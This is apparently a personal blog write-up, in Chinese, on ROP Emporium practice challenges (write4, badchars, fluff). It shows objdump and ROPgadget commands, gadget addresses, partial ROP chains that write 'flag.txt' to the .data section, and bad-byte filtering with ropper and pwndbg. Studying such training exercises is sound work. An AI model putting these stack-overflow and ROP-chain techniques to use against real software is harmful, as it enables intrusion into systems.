<<基本ROP_ropemporium 第三到四题

发表于 分类于 阅读次数: Valine:
本文字数: 3.2k 阅读时长 ≈ 3 分钟

ROP Emporium write4,badchars,fluff
write4和badchars都解出来了,fluff找不到有用的gadget
代码:https://github.com/Finsenty54/attack-code/tree/master/ROPemporium

命令

瞎搜找到的:
https://github.com/abatchy17/ROP-Emporium

  1. Get function names: nm binary | grep ' t '
  2. Get GOT entries: readelf --relocs binary
  3. Get PLT entries: objdump -M intel -dj .plt binary
  4. Get strings: strings binary or the much better alternative rabin2 -z binary
  5. Virtual address space layout: vmmap in PEDA after starting program, otherwise other modules aren’t mapped yet.

write

32位

当前指令地址PC

objdump -s
objdump -R 
objdump --section=.plt -d ./write432 //查看plt

./write432: file format elf32-i386

Disassembly of section .plt:

080483a0 <.plt>:
 80483a0:    ff 35 04 a0 04 08        pushl  0x804a004
 80483a6:    ff 25 08 a0 04 08        jmp    *0x804a008
 80483ac:    00 00                    add    %al,(%eax)
    ...

080483b0 <pwnme@plt>:
 80483b0:    ff 25 0c a0 04 08        jmp    *0x804a00c
 80483b6:    68 00 00 00 00           push   $0x0
 80483bb:    e9 e0 ff ff ff           jmp    80483a0 <.plt>

080483c0 <__libc_start_main@plt>:
 80483c0:    ff 25 10 a0 04 08        jmp    *0x804a010
 80483c6:    68 08 00 00 00           push   $0x8
 80483cb:    e9 d0 ff ff ff           jmp    80483a0 <.plt>

080483d0 <print_file@plt>:
 80483d0:    ff 25 14 a0 04 08        jmp    *0x804a014
 80483d6:    68 10 00 00 00           push   $0x10
 80483db:    e9 c0 ff ff ff           jmp    80483a0 <.plt>

objdump -j .plt -d ./write432命令效果一样

ROPgadget --binary ./write432 --only 'mov|ret'
ROPgadget --binary ./write432 --only 'mov|ret' | grep ebx

要点:print_file参数是一个地址,所以不能用字符串

0x00001018    0x8 0x0804a018    0x8 -rw- .data

我选择把字符串放到data段上。

dataaddress=p32(0x0804a018)
data1=b'flag'
data2=b'.txt'

第一次我数据没有分开,ebp只有32位,一次只能传4字节,我第一次竟然没有认识到

64位

│           0x0040061b      bfb4064000     mov edi, str.nonexistent    ; 0x4006b4 ; "nonexistent"
│           0x00400620      e8ebfeffff     call sym.imp.print_file

参数传到RDI
#0x0000000000400628 : mov qword ptr [r14], r15 ; ret
#0x0000000000400690 : pop r14 ; pop r15 ; ret
#0x0000000000400693 : pop rdi ; ret

gadget=popret+dataaddress+data+movret
gadget+=popret1+dataaddress
gadget+=printfile

badchars

32位

Badchars are the reason that encoders such as shikata-ga-nai exist.
这里,会将badchars替换为0xeb

IDA永远的神
反编译

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int pwnme()
{
  unsigned int v1; // [esp+0h] [ebp-38h]
  unsigned int i; // [esp+4h] [ebp-34h]
  unsigned int j; // [esp+8h] [ebp-30h]
  char v4[36]; // [esp+10h] [ebp-28h]

  setvbuf(stdout, 0, 2, 0);
  puts("badchars by ROP Emporium");
  puts("x86\n");
  memset(v4, 0, 0x20u);
  puts("badchars are: 'x', 'g', 'a', '.'");
  printf("> ");
  v1 = read(0, v4, 0x200u);
  for ( i = 0; i < v1; ++i )
  {
    for ( j = 0; j <= 3; ++j )
    {
      if ( v4[i] == badcharacters[j] )
        v4[i] = -21;
    }
  }
  return puts("Thank you!");
}

命令

man 7 ascii
查看ascii表

ropper --file ./badchars32 -b 6167782e
ropper排除badchars是这样用的,ROPgadget也是一样的

gdb_peda: 查看溢出点

gdb-peda$ pattern_create 100
gdb-peda$ pattern_offset AFAA
AFAA found at offset: 44

pwndbg> rop --grep xor -- --badbytes 6167782e --ropchain --nojop

寄存器解析

bl is the name of the low 8 bits (bits 7-0) in the ebx register. There is also bh which is the bits 15-8 of ebx, and bx is the low 16 bits (bits 15-0). There is no name for the higher 16 bits.

This applies to all of the registers eax, ebx, ecx and edx.
搞错了,bl不是ebp中,而是ebx
https://blog.csdn.net/ww506772362/article/details/75530723

疑问:
我第一次传xor 参数ebx 的时候是00 00 00 8a , 放在栈中是00 00 00 8a , pop ebx , 是倒取读入?
所以是8a 00 00 00

EBP: 0x41304141 (‘AA0A’)

64位

r14b

r14 r14d r14w r14b
有个坑
x的位置刚好是2e会被替换

Failed to open file: flag.t\xebt

目前没有找到可以用的gadget

fluff

同样没有有用的gadget
mov [e?x],
xchg [ecx],dl
pext edx, ebx, eax

pext 解析
https://blog.csdn.net/qq_43401808/article/details/86540472

这条命令能用,但是没有pop eax